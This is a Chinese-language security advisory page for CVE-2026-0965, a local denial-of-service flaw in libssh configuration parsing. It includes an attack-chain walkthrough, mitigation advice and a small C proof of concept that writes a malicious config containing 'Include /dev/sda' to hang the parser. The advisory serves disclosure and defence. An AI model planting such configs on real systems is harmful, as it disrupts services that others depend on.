CVE-2026-0965 CVSS 3.3 低危

CVE-2026-0965 libssh配置解析DoS漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0965

漏洞类型

拒绝服务

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

libssh

漏洞概述

libssh组件在配置解析过程中存在一个安全缺陷，允许程序尝试打开任意文件。本地攻击者可以通过提供恶意的配置文件或利用系统错误配置来利用此漏洞。该漏洞可能导致拒绝服务（DoS），具体表现为系统尝试访问危险文件（如块设备或大型系统文件），从而中断正常操作。虽然需要本地低权限且交互要求低，但其对系统可用性构成潜在威胁。

技术细节

该漏洞源于libssh在处理配置文件时的逻辑缺陷。当libssh解析配置时，未对文件路径进行充分的校验或限制，导致其可以尝试打开系统中的任意路径文件。攻击者利用此漏洞通常需要具备本地低权限账户。攻击场景包括创建一个恶意的SSH配置文件，或者诱导/等待应用程序（使用libssh）去解析一个受控的配置目录。当libssh尝试解析该配置并打开其中指定的特定文件（例如`/dev/urandom`、`/dev/zero`或巨大的日志文件）时，可能会消耗大量的系统资源（I/O或CPU），或者因为读取设备文件而挂起进程。由于CVSS向量显示机密性和完整性无影响，主要影响在于可用性（A:L），即造成服务拒绝。这种攻击不需要用户交互，一旦配置被加载，攻击即可自动触发。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者获得目标系统的本地低权限用户访问权限。

STEP 2

2. 构造恶意配置

攻击者创建一个包含恶意路径（如指向块设备）的libssh配置文件。

STEP 3

3. 触发解析

攻击者诱使应用程序加载该配置文件，或将其放置在自动加载的目录中。

STEP 4

4. 拒绝服务

libssh尝试打开恶意路径文件，导致资源耗尽或进程挂起，引发DoS。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-0965: libssh Arbitrary File Open DoS
 * Description: Create a malicious configuration file pointing to a blocking device.
 * Usage: Point libssh based application to load this config file.
 */
#include <stdio.h>

void generate_malicious_config() {
    FILE *fp = fopen("malicious_config", "w");
    if (!fp) return;
    // Attempt to force libssh to open a block device causing a hang
    fprintf(fp, "Include /dev/sda\n"); 
    // Or a large file causing resource exhaustion
    // fprintf(fp, "IdentityFile /var/log/syslog\n"); 
    fclose(fp);
    printf("Malicious config file 'malicious_config' generated.\n");
    printf("Trigger: Application loading this config may hang or crash.\n");
}

int main() {
    generate_malicious_config();
    return 0;
}

影响范围

libssh (具体受影响版本请参考厂商安全公告)

防御指南

临时缓解措施

建议限制对libssh配置目录和文件的写入权限，确保只有受信任的管理员账户能够修改配置。同时，监控系统中libssh进程的I/O行为，一旦检测到异常访问非标准文件类型的操作，应及时告警并检查配置文件完整性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表